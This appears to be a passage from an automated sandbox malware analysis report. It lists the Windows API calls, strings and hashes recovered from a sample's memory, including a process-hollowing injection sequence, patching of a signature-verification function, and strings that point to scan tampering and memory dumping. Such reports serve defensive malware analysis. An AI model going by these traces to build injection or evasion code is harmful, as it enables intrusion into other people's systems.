                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                • API String ID: 667068680-597814768
                                                                • Opcode ID: 12db1a792d038968277a68a6be14a776bd28d63a1256ba921b28b76bfebf1b7c
                                                                • Instruction ID: 06c0f3f002bf5048ae22ccb1e193c5c6e6cdde0c3931df604fec88b034860214
                                                                • Opcode Fuzzy Hash: 12db1a792d038968277a68a6be14a776bd28d63a1256ba921b28b76bfebf1b7c
                                                                • Instruction Fuzzy Hash: 0131C3B2E85328AFFB10AFB5D8C9E3637ADEB8A70070009A5A505CF684D7759C20CF55
                                                                APIs
                                                                  • Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                  • Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                  • Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0293F3BC,0293F3AC,OpenSession,0293F384,02919CD0,ScanString,0293F384), ref: 0291866E
                                                                • GetThreadContext.KERNEL32(00000000,0293F400,ScanString,0293F384,02919CD0,UacInitialize,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,UacInitialize,0293F384), ref: 02918A07
                                                                • NtReadVirtualMemory.NTDLL(00000000,-00000008,0293F4D4,00000004,0293F4DC), ref: 02918C64
                                                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02918DDF
                                                                  • Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
                                                                  • Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
                                                                  • Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957
                                                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,0293F4DC), ref: 02919433
                                                                • NtWriteVirtualMemory.NTDLL(00000000,-00000008,0293F4D8,00000004,0293F4DC), ref: 029195A6
                                                                • SetThreadContext.KERNEL32(00000000,0293F400,ScanBuffer,0293F384,02919CD0,ScanString,0293F384,02919CD0,Initialize,0293F384,02919CD0,00000000,-00000008,0293F4D8,00000004,0293F4DC), ref: 0291971C
                                                                • NtResumeThread.NTDLL(00000000,00000000), ref: 02919729
                                                                  • Part of subcall function 02917CA8: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize,0293F384,02919CD0,UacScan), ref: 02917CBC
                                                                  • Part of subcall function 02917CA8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02917CD6
                                                                  • Part of subcall function 02917CA8: NtWriteVirtualMemory.NTDLL(00000000,00000000,0293F368,00000001,0293F374), ref: 02917CFC
                                                                  • Part of subcall function 02917CA8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize), ref: 02917D12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                • API String ID: 2533507481-51457883
                                                                • Opcode ID: e971c4d0c22b4fd04fdc2640f71b23fc2ccafaffc82b991ad27e2ae44cd4f300
                                                                • Instruction ID: cb45c2f2beee22c792f3ef6afa8ab2fedeb6ae4b8155a9c40135e4cc48334c8d
                                                                • Opcode Fuzzy Hash: e971c4d0c22b4fd04fdc2640f71b23fc2ccafaffc82b991ad27e2ae44cd4f300
                                                                • Instruction Fuzzy Hash: ACE21535A1011C9FEB11EBA4CDD0EDEB3FAAFC5710F1055A1A209AB294DE30AE46CF55
                                                                APIs
                                                                  • Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                  • Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                  • Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0293F3BC,0293F3AC,OpenSession,0293F384,02919CD0,ScanString,0293F384), ref: 0291866E
                                                                • GetThreadContext.KERNEL32(00000000,0293F400,ScanString,0293F384,02919CD0,UacInitialize,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,UacInitialize,0293F384), ref: 02918A07
                                                                • NtReadVirtualMemory.NTDLL(00000000,-00000008,0293F4D4,00000004,0293F4DC), ref: 02918C64
                                                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02918DDF
                                                                  • Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
                                                                  • Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
                                                                  • Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                • API String ID: 3979268988-51457883
                                                                • Opcode ID: d798f66ffdb3a49bc23036b98f2922ac38f5b76b3bd11625abe596938fca1b41
                                                                • Instruction ID: db22322554015d2ab7a8b0c47a75f123d3f6fb714c83e8ba3942a755522ba66b
                                                                • Opcode Fuzzy Hash: d798f66ffdb3a49bc23036b98f2922ac38f5b76b3bd11625abe596938fca1b41
                                                                • Instruction Fuzzy Hash: 67E21535A1011C9FEB11EBA4CDD0EDEB3FAAFC5710F1055A1A209AB294DE30AE46CF51
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 029058D1
                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 029058E8
                                                                • lstrcpyn.KERNEL32(?,?,?), ref: 02905918
                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 0290597C
                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 029059B2
                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 029059C5
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 029059D7
                                                                • lstrlen.KERNEL32(?,000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 029059E3
                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 02905A17
                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 02905A23
                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 02905A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                • API String ID: 3245196872-1565342463
                                                                • Opcode ID: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
                                                                • Instruction ID: 21ea11e3a9ba8686979c2074f08458f0ed82b6e8e51211b2f8388ca496123e9c
                                                                • Opcode Fuzzy Hash: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
                                                                • Instruction Fuzzy Hash: 6D415972D0025DAFDF10DAE8CCC8ADEB3AEBF88340F4545A5A548E7281E7709E848F50
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029179C5
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029179CB
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 029179E9
                                                                Strings
                                                                • NtProtectVirtualMemory, xrefs: 029179BB
                                                                • C:\Windows\System32\ntdll.dll, xrefs: 029179C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleMemoryModuleProcProtectVirtual
                                                                • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                • API String ID: 1550029230-1386159242
                                                                • Opcode ID: 3e4a611d7211fed2fac4228ac5d63660f58e5eda3b7b663d4b9ad61c48be0fcb
                                                                • Instruction ID: c586b9e19b9f431dfa1c7c7386342cecc334f82c7e0d63846a811ccdc3b71ac9
                                                                • Opcode Fuzzy Hash: 3e4a611d7211fed2fac4228ac5d63660f58e5eda3b7b663d4b9ad61c48be0fcb
                                                                • Instruction Fuzzy Hash: 3FE0B6B6A8020DAF9B40EFD9E885DDB77ECAB5C3807004805BA19D7240C734E9219FB0
                                                                APIs
                                                                  • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
                                                                • NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
                                                                • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
                                                                • NtClose.NTDLL(?), ref: 0291C783
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                • String ID:
                                                                • API String ID: 3764614163-0
                                                                • Opcode ID: 5481fe5d920a3503657b805e125c66fc26c90133e02882083dd3b5e42ff351e8
                                                                • Instruction ID: 32b12fb14fb4d73f7eac41ad50adf8c8259b93af3a146ab0b999575a39871558
                                                                • Opcode Fuzzy Hash: 5481fe5d920a3503657b805e125c66fc26c90133e02882083dd3b5e42ff351e8
                                                                • Instruction Fuzzy Hash: 7921BE71A8030DBEEB11EAE5CC82FEEB7BD9F44B00F505562B604F61C0D7B4AE058A55
                                                                APIs
                                                                  • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
                                                                • NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
                                                                • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
                                                                • NtClose.NTDLL(?), ref: 0291C783
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                • String ID:
                                                                • API String ID: 3764614163-0
                                                                • Opcode ID: 8ca72002a824c80872189d1af99fdc06f6f7301b5a7bfa9bede1dcd48a4ecbdf
                                                                • Instruction ID: 363738a11a034c8639d6e5f810bef75bba1993bf25b8bab774c7ba62390ebd50
                                                                • Opcode Fuzzy Hash: 8ca72002a824c80872189d1af99fdc06f6f7301b5a7bfa9bede1dcd48a4ecbdf
                                                                • Instruction Fuzzy Hash: 8721C071A8030DBEEB11EAD5CC82FDEB7BD9F44B00F505562B604F71C0D7B4AA058A55
                                                                APIs
                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02907F6D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1705453755-0
                                                                • Opcode ID: dac0873e2f3e157ecf30ba3f5d911e29ce506fd64723b3ce0cb9852a3f4ef5e0
                                                                • Instruction ID: 5607cb9a49eeaf2bdfa949f5bdb9aabbabdb3e3872d1442d3c467ba67c53440c
                                                                • Opcode Fuzzy Hash: dac0873e2f3e157ecf30ba3f5d911e29ce506fd64723b3ce0cb9852a3f4ef5e0
                                                                • Instruction Fuzzy Hash: 981100B5A00209AF9B04CF99C8809AFF7F9FFC8304B14C569A509EB254E6319A01CBA0
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 25d06dcc3a8a2b3df01f6200e1cf3979e7b2ab7fc5636c56a67a6884020739db
                                                                • Instruction ID: f43b3bfa3688737b0026599daec17d86981229e1e3d4e34d1a0ad59838153a2f
                                                                • Opcode Fuzzy Hash: 25d06dcc3a8a2b3df01f6200e1cf3979e7b2ab7fc5636c56a67a6884020739db
                                                                • Instruction Fuzzy Hash: 21E09235B0021C1AD711A9985CC0AEAB29D9798350F00416AAA04C73C0EEA0AD804AE4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: a6b64114cd969191f3c808e8b3db40db99efaacbefbc36c0af7aee1f84f4d6ae
                                                                • Instruction ID: dfa1f4cf206f3f2dfbd06017c34ae7445f39d1229c52db54a6783ae3f09fa3e0
                                                                • Opcode Fuzzy Hash: a6b64114cd969191f3c808e8b3db40db99efaacbefbc36c0af7aee1f84f4d6ae
                                                                • Instruction Fuzzy Hash: 4DF03A75D483018FC360DF28D4A0A2977FAFB88B00F014D28E498C7380E73894298F16
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0290BDEA,00000000,0290C003,?,?,00000000,00000000), ref: 0290A79B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
                                                                • Instruction ID: 607ab4dfbc471601296cf018d1975ad13636c506555ff2f350acc7b43ed1e352
                                                                • Opcode Fuzzy Hash: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
                                                                • Instruction Fuzzy Hash: 96D05E6631D2643EA310519A2DD4DBBAAECCAC57A1F00843AF648C6180D2008C0697B1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID:
                                                                • API String ID: 481472006-0
                                                                • Opcode ID: 55d25a43ec22de918725fd133b871e080edd18120f93c639a8c296fbe121a14f
                                                                • Instruction ID: a21ab4b1eee21e22d349679a0736312d1c372acfe7a2360d9dfb955818109d7a
                                                                • Opcode Fuzzy Hash: 55d25a43ec22de918725fd133b871e080edd18120f93c639a8c296fbe121a14f
                                                                • Instruction Fuzzy Hash: 46A0120040582009814033180C0213C30485841720FC80B4468F8552D0EA1D013041D3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002947000.00000040.00001000.00020000.00000000.sdmp, Offset: 02947000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2947000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                • Instruction ID: f7269753c4f8ce8fb03626b1720095287e8651704675cf503041d80ebf566234
                                                                • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                • Instruction Fuzzy Hash: 7CF01232294259DFD761CE99E8C0FD9F3ACEB4067DF690869D94097151DB20E844C650
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0290D215
                                                                  • Part of subcall function 0290D1E0: GetProcAddress.KERNEL32(00000000), ref: 0290D1F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                • API String ID: 1646373207-1918263038
                                                                • Opcode ID: 273d6894efcd6e2434be17a98c31c5a79a32ecb8d8fafd83d6cd1f33a0797929
                                                                • Instruction ID: 372493c25a5b01d3d910f29407324c0c2737031960660f26aff34bf14468aefd
                                                                • Opcode Fuzzy Hash: 273d6894efcd6e2434be17a98c31c5a79a32ecb8d8fafd83d6cd1f33a0797929
                                                                • Instruction Fuzzy Hash: 9F416265A4830CDF5648ABED74C142B7BEAEACC7503A0451BF408CBBC5DE60BD518BB9
                                                                APIs
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A394
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0291A3AB
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0291A3B1
                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0291A3C3
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A43F
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 0291A44B
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 0291A45F
                                                                Strings
                                                                • LoadLibraryExA, xrefs: 0291A3A1
                                                                • C:\Windows\System32\KernelBase.dll, xrefs: 0291A3A6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: HugeRead$AddressHandleLibraryLoadModuleProc
                                                                • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                • API String ID: 2109905598-1650066521
                                                                • Opcode ID: bdd4d9b6ac58171e40c6332818e461e1d74a44c82de6a72f83bb279c6d152f7b
                                                                • Instruction ID: 9ecef51b46eec369c2676320897a9bcf14c93f36d14d02ece2718b158d0e8a93
                                                                • Opcode Fuzzy Hash: bdd4d9b6ac58171e40c6332818e461e1d74a44c82de6a72f83bb279c6d152f7b
                                                                • Instruction Fuzzy Hash: 02314271A4130DBFDB20DBA6CC8AF6A77ACAF45325F004554EA18DB2C1D370AD50CBA4
                                                                APIs
                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029028CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                • API String ID: 2030045667-32948583
                                                                • Opcode ID: 47c834b36d6720c7655fdfae86e3368dabed165f207fadc95d3758e4bb607eb4
                                                                • Instruction ID: 923d5cb4fffafbe79c87d04e0d6fadfecedec752d0aa8455147155dec5da8d1b
                                                                • Opcode Fuzzy Hash: 47c834b36d6720c7655fdfae86e3368dabed165f207fadc95d3758e4bb607eb4
                                                                • Instruction Fuzzy Hash: 81A1AE30E0436C8FDB21AB2CCCC8B99B6E9EB49750F1440E5ED49AB2C6CB759985CB51
                                                                Strings
                                                                • bytes: , xrefs: 0290275D
                                                                • An unexpected memory leak has occurred. , xrefs: 02902690
                                                                • The unexpected small block leaks are:, xrefs: 02902707
                                                                • 7, xrefs: 029026A1
                                                                • , xrefs: 02902814
                                                                • Unexpected Memory Leak, xrefs: 029028C0
                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02902849
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                • API String ID: 0-2723507874
                                                                • Opcode ID: 0b97dfe6cc09a10a2867fd445523771a034eec209098934586b5b256cc679ae2
                                                                • Instruction ID: 8f10cbe5fe78a3922926f824245ac42586bbd23df260fa9b034e1d126e140513
                                                                • Opcode Fuzzy Hash: 0b97dfe6cc09a10a2867fd445523771a034eec209098934586b5b256cc679ae2
                                                                • Instruction Fuzzy Hash: CC71A030E042AC8FDF219B2CCCC8B99BAE9EB49704F1041E5D949AB2C1DB759AC5CF51
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000000,0290C003,?,?,00000000,00000000), ref: 0290BD6E
                                                                  • Part of subcall function 0290A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
